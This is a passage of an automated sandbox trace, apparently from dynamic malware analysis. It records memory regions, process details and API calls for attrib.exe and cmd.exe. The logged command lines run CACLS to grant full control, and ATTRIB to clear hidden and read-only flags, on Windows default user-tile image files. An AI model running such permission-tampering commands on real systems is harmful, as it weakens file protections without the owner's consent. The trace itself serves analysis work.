Region: id = 26233 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26234 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26235 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 26236 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 26237 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26238 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26239 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26240 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26241 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26242 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = 
"\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26243 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 523 os_tid = 0xdb0 Thread: id = 524 os_tid = 0x91c Process: id = "366" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x514" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "364" os_parent_pid = "0xfd0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26244 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26245 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26246 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26247 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26248 start_va = 0x200000 end_va = 0x206fff entry_point = 0x200000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26249 
start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26250 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26251 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26252 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26253 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26254 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26255 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26256 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26257 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 26258 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26259 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" 
(normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26260 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26261 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26262 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26263 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26264 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26265 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26266 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26267 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26268 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = 
"gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26269 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26270 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 26271 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 26272 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26273 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 525 os_tid = 0xdb8 Process: id = "367" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" 
[0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26274 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26275 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26276 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26277 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 26278 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26279 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26280 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26281 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26282 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26283 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26284 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26285 start_va = 0x20000 end_va = 
0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26286 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26287 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 26288 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 26289 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26290 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26291 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26292 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26293 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26294 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") 
Region: id = 26295 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26296 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26297 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26298 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 26299 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26300 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26301 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26302 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 26303 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 26304 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 26305 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 26306 start_va 
= 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 26307 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 26308 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 526 os_tid = 0xd80 [0184.936] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf7dc | out: lpSystemTimeAsFileTime=0x1cf7dc*(dwLowDateTime=0xa322bb00, dwHighDateTime=0x1d440a9)) [0184.936] GetCurrentProcessId () returned 0xd48 [0184.936] GetCurrentThreadId () returned 0xd80 [0184.936] GetTickCount () returned 0x34e5d [0184.936] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf7d4 | out: lpPerformanceCount=0x1cf7d4*=24172658377) returned 1 [0184.940] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0184.940] __set_app_type (_Type=0x1) [0184.940] __p__fmode () returned 0x76b331f4 [0184.940] __p__commode () returned 0x76b331fc [0184.940] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0184.940] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0184.940] GetCurrentThreadId () returned 0xd80 [0184.940] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd80) returned 0x38 [0184.940] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0184.940] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0184.941] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.941] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, 
HeapInformationLength=0x0) returned 1 [0184.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf76c | out: phkResult=0x1cf76c*=0x0) returned 0x2 [0184.941] VirtualQuery (in: lpAddress=0x1cf7a3, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0184.941] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0184.941] GetConsoleOutputCP () returned 0x1b5 [0184.941] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0184.941] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0184.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.941] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0184.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.942] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: 
lpMode=0x4a9e41ac) returned 1 [0184.942] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.942] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.942] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.942] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0184.942] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.942] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0184.942] GetEnvironmentStringsW () returned 0x2c0308* [0184.943] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.943] GetEnvironmentStringsW () returned 0x2c0308* [0184.943] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0184.943] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0xb8, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: 
lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegCloseKey (hKey=0x40) returned 0x0 [0184.943] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.943] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) 
returned 0x0 [0184.944] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0184.944] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0184.944] RegCloseKey (hKey=0x40) returned 0x0 [0184.944] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886393 [0184.944] srand (_Seed=0x5b886393) [0184.944] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" [0184.944] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" [0184.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0184.944] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0184.944] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.945] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") 
returned 0x35 [0184.945] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.945] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0184.945] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0184.945] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0184.945] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0184.945] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0184.945] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0184.945] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0184.945] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0184.945] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0184.945] GetEnvironmentStringsW () returned 0x2c2458* [0184.945] FreeEnvironmentStringsW (penv=0x2c2458) returned 1 [0184.945] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.945] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0184.945] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0184.945] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0184.945] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0184.945] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0184.945] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0184.945] _wcsicmp (_String1="KEYS", 